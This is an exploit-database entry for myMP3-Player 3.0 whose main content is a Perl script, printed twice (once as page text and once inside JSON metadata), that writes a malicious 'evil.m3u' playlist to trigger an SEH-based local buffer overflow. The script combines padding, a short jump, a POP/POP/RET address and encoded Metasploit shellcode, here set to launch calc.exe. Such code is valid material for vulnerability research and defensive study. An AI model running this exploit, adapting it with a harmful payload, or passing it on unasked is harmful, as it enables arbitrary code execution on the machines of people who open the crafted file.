Search...

myMP3-Player 3.0 - .m3u Local Buffer Overflow (SEH)

2010-03-18T00:00:00

ID EXPLOITPACK:82514805C7E9AB1398F507D509A02E60
Type exploitpack
Reporter n3w7u
Modified 2010-03-18T00:00:00

Description

myMP3-Player 3.0 - .m3u Local Buffer Overflow (SEH)

                                        
                                            #!/usr/bin/perl

# Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
# Date: 18.03.2010
# Author: n3w7u
# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
# Version: 3.0 and the other version can't be download from serious Page, and don't be free.
# Tested on: Windows XP SP3 (ger)


#[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]

my $file= "evil.m3u";
my $junk ="\x41" x 1040; # for myMp3 Player 5/cracked junk =1056
my $jmp="\xEB\x08\x90\x90"; # jmp short
my $seh="\x25\x12\xC8\x72"; #72 C8 12 25 msacm32.drv
my $nop ="\x90" x 20;
my $nops ="\x90" x 10;

# windows/exec - 224 bytes
# http://www.metasploit.com
# Encoder: x86/call4_dword_xor
# EXITFUNC=process, CMD=calc.exe
my $buf =
"\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce" .
"\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62" .
"\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e" .
"\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e" .
"\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b" .
"\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd" .
"\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f" .
"\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a" .
"\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96" .
"\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35" .
"\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93" .
"\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9" .
"\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b" .
"\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01" .
"\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce";

open($File,"&gt;$file");
print $File $junk.$jmp.$seh.$nop.$buf.$nops;
close($File);

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:06:02", "references": [], "description": "\nmyMP3-Player 3.0 - .m3u Local Buffer Overflow (SEH)", "edition": 1, "reporter": "n3w7u", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2010-03-18T00:00:00", "title": "myMP3-Player 3.0 - .m3u Local Buffer Overflow (SEH)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:06:02", "rev": 2}, "score": {"value": 0.7, "vector": "NONE", "modified": "2020-04-01T19:06:02", "rev": 2}, "vulnersScore": 0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2010-03-18T00:00:00", "id": "EXPLOITPACK:82514805C7E9AB1398F507D509A02E60", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/perl\n\n# Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)\n# Date: 18.03.2010\n# Author: n3w7u\n# Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html\n# Version: 3.0 and the other version can't be download from serious Page, and don't be free.\n# Tested on: Windows XP SP3 (ger)\n\n\n#[ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]\n\nmy $file= \"evil.m3u\";\nmy $junk =\"\\x41\" x 1040; # for myMp3 Player 5/cracked junk =1056\nmy $jmp=\"\\xEB\\x08\\x90\\x90\"; # jmp short\nmy $seh=\"\\x25\\x12\\xC8\\x72\"; #72 C8 12 25 msacm32.drv\nmy $nop =\"\\x90\" x 20;\nmy $nops =\"\\x90\" x 10;\n\n# windows/exec - 224 bytes\n# http://www.metasploit.com\n# Encoder: x86/call4_dword_xor\n# EXITFUNC=process, CMD=calc.exe\nmy $buf =\n\"\\x2b\\xc9\\x83\\xe9\\xce\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\" .\n\"\\x0e\\xa8\\x6e\\x77\\xce\\x83\\xee\\xfc\\xe2\\xf4\\x54\\x86\\xfe\\xce\" .\n\"\\xa8\\x6e\\x17\\x47\\x4d\\x5f\\xa5\\xaa\\x23\\x3c\\x47\\x45\\xfa\\x62\" .\n\"\\xfc\\x9c\\xbc\\xe5\\x05\\xe6\\xa7\\xd9\\x3d\\xe8\\x99\\x91\\x46\\x0e\" .\n\"\\x04\\x52\\x16\\xb2\\xaa\\x42\\x57\\x0f\\x67\\x63\\x76\\x09\\x4a\\x9e\" .\n\"\\x25\\x99\\x23\\x3c\\x67\\x45\\xea\\x52\\x76\\x1e\\x23\\x2e\\x0f\\x4b\" .\n\"\\x68\\x1a\\x3d\\xcf\\x78\\x3e\\xfc\\x86\\xb0\\xe5\\x2f\\xee\\xa9\\xbd\" .\n\"\\x94\\xf2\\xe1\\xe5\\x43\\x45\\xa9\\xb8\\x46\\x31\\x99\\xae\\xdb\\x0f\" .\n\"\\x67\\x63\\x76\\x09\\x90\\x8e\\x02\\x3a\\xab\\x13\\x8f\\xf5\\xd5\\x4a\" .\n\"\\x02\\x2c\\xf0\\xe5\\x2f\\xea\\xa9\\xbd\\x11\\x45\\xa4\\x25\\xfc\\x96\" .\n\"\\xb4\\x6f\\xa4\\x45\\xac\\xe5\\x76\\x1e\\x21\\x2a\\x53\\xea\\xf3\\x35\" .\n\"\\x16\\x97\\xf2\\x3f\\x88\\x2e\\xf0\\x31\\x2d\\x45\\xba\\x85\\xf1\\x93\" .\n\"\\xc2\\x6f\\xfa\\x4b\\x11\\x6e\\x77\\xce\\xf8\\x06\\x46\\x45\\xc7\\xe9\" .\n\"\\x88\\x1b\\x13\\x9e\\xc2\\x6c\\xfe\\x06\\xd1\\x5b\\x15\\xf3\\x88\\x1b\" .\n\"\\x94\\x68\\x0b\\xc4\\x28\\x95\\x97\\xbb\\xad\\xd5\\x30\\xdd\\xda\\x01\" .\n\"\\x1d\\xce\\xfb\\x91\\xa2\\xad\\xc9\\x02\\x14\\xe0\\xcd\\x16\\x12\\xce\";\n\nopen($File,\">$file\");\nprint $File $junk.$jmp.$seh.$nop.$buf.$nops;\nclose($File);", "cvss": {"score": 0.0, "vector": "NONE"}}